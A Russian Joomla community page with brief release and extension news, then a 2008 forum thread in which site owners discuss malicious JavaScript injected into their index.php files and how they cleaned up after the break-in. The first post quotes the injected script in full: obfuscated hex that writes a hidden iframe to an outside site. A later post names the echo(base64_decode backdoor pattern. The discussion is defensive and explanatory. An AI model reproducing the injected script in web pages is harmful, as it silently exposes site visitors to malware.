Новости Joomla

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 2781 Просмотров
*

annik

  • Осваиваюсь на форуме
  • 39
  • 2 / 1
index.php + JS в конце
« : 16.06.2008, 10:59:10 »
Чем можно расшифровать?
Код
script type="text/javascript">

</script><script>function v485549d407dae(v485549d408198){ var v485549d40857f=16; return(parseInt(v485549d408198,v485549d40857f));}function v485549d408d4d(v485549d409133){  var v485549d4095b4='';for(v485549d409905=0; v485549d409905<v485549d409133.length; v485549d409905+=2){ v485549d4095b4+=(String.fromCharCode(v485549d407dae(v485549d409133.substr(v485549d409905, 2))));}return v485549d4095b4;} document.write(v485549d408d4d('3C696672616D65206E616D653D2734623627207372633D27687474703A2F2F6B616B6173686B612E7573272077696474683D353530206865696768743D3436207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
Дописали мне в конце index.php
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #1 : 16.06.2008, 11:03:44 »
А смысл расшифровывать? Дописал это робот, который обходит сайты по ftp, используя данные, украденные с помощью троянов. Как правило дописываемый код имеет целью дальнейшее распространение трояна на компьютеры посетителей сайта.

Как от этого избавиться в принципе не раз уже на форуме писалось.

1. Сделать полную проверку компьютера, имеющего доступ по ftp к зараженному сайту на вирусы и трояны, до тех пор, пока не найдете и не вылечите.
2. Сменить пароль на ftp
3. Восстановить файлы сайта из последнего бекапа перед заражением (при условии что бекап производится регулярно)
4. В дальнейшем активно использовать антивирус, не забывать обновлсять ПО и не хранить пароли в программах для работы с FTP...
*

PaLyCH

  • Давно я тут
  • 958
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #2 : 16.06.2008, 11:53:08 »
Полностью восстанавливать наверно не стоит, у меня таже самая проблема была. решилось просто. Просмотр всех файлов index.php в шаблонах сайта и админки, index.php в корне сайта и в корне админке. Поставить на них права 555
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #3 : 16.06.2008, 13:37:14 »
2 дня борюсь с той же проблемой.
Стоит:
Joomla! 1.0.12
Register Globals: OFF 
Register Globals: OFF 
Magic Quotes: ON 
Safe Mode: OFF 
File Uploads: ON 
Session auto start: OFF 

444 - chmod на index.php в templates
.....
по логам обнаружила что с IP вредоносного и гадосного врага подгрузили /administrator/components/com_banners/banners.html.php где были пароли на вход в админку
 и потом сколько я не удаляля его прописаные JavaScript c трояном  он мне демонстративно их вставлял и еще и показывал, что chmod он тоже может поменять без моего ведома.

Мои действия:
1.Заблокировала IP
2. почистила и провелила на наличие посторонних файлов не входящих в ранее в мою сборку сайта
3. еще раз перезалила папку templates и еще раз поставила 444 - chmod
4. заодно проверила inframe - не нашла
5. поменяла FTP пароли (каюсь, хранила в клиенте-ленивая......)
6. сижу и проверяю касперским компьютер (Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)

 >:( :( :o
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #4 : 16.06.2008, 13:42:22 »
Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)
Если он вас устраивает, я бы ничего не менял. А в дополнение к Касперскому поставил бы допустим что-то типа TrojanRemover и периодически проверял бы еще им...

p.s. У самого правда стоит бесплатный AVG, перед этим месяца 2 стоял бесплатная версия Avira... но подумываю перейти на касперского...
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #5 : 16.06.2008, 13:54:04 »
Да, проблема то в том, что и у меня он пока безплатный до этого стоял докторвеб+ комодо и я нахваталась......А касперский реально поттормаживает работу в интернете...Перестала т.е. почти нет возможности принять почту gmail/

К предыдущему вопросу...как проверить свои компоненты на наличие дыр...
И RequestFilter можно ставить на 1.0.12?
*

PaLyCH

  • Давно я тут
  • 958
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #6 : 25.06.2008, 12:35:07 »
Снова обнаружился взлом одного из сайта. В этот раз index.php не был затронут. Были затронуты index.html.
Действия те же, удалить неизвестные скрипты и поставить 555 на эти файлы.
От троянцев помог AVG. Он единственный нашел у меня 113!!!! троянцев на компе
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #7 : 30.06.2008, 16:59:04 »
Сегодня опять 25....ап и снова Касперский вопит на троян. И вроде все сделала правильно (ну как тут советовали) . НО не проверила ядро на backdoor и shells. Сделала, когда посмотрела логи и увидела куда ломаются.
И что оказалось, на самом то деле меня еще 3 месяца назад взломали....- понапихивали файликов ну очень похожих на "взаправдашие", но по сути ПАКОСТЬ редкая. Проверила на содержание подобной строки типа echo(base64_decode  ......и  АП, есть такие.
Очень поучительно почитать форум antichat.ru - ПОВБИВАЛА!!! Но полезно.
Вывод - надо предохраняться!!!! И прежде всего дыры это ошибка админа или халатность. Но получается полная параноя.

P.S. Извините за эмоциональность!!! 2 часа жизни под хвост!!!!

Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 6048
Последний ответ 08.05.2021, 16:16:32
от gartes
Запретить смену прав на index.php - Joomla

Автор magrychev

Ответов: 5
Просмотров: 3414
Последний ответ 24.10.2017, 21:14:24
от winstrool
Добавляется адрес к index.php

Автор kokon_zver

Ответов: 8
Просмотров: 2497
Последний ответ 21.11.2016, 10:34:29
от Дмитрий_76
htaccess и htpasswd пароль только на url с параметром например "index.php?test"

Автор ice99

Ответов: 4
Просмотров: 2154
Последний ответ 28.08.2016, 20:52:51
от flyingspook
Количество файлов index.php

Автор kouichiro

Ответов: 13
Просмотров: 1775
Последний ответ 04.04.2016, 07:06:10
от Morh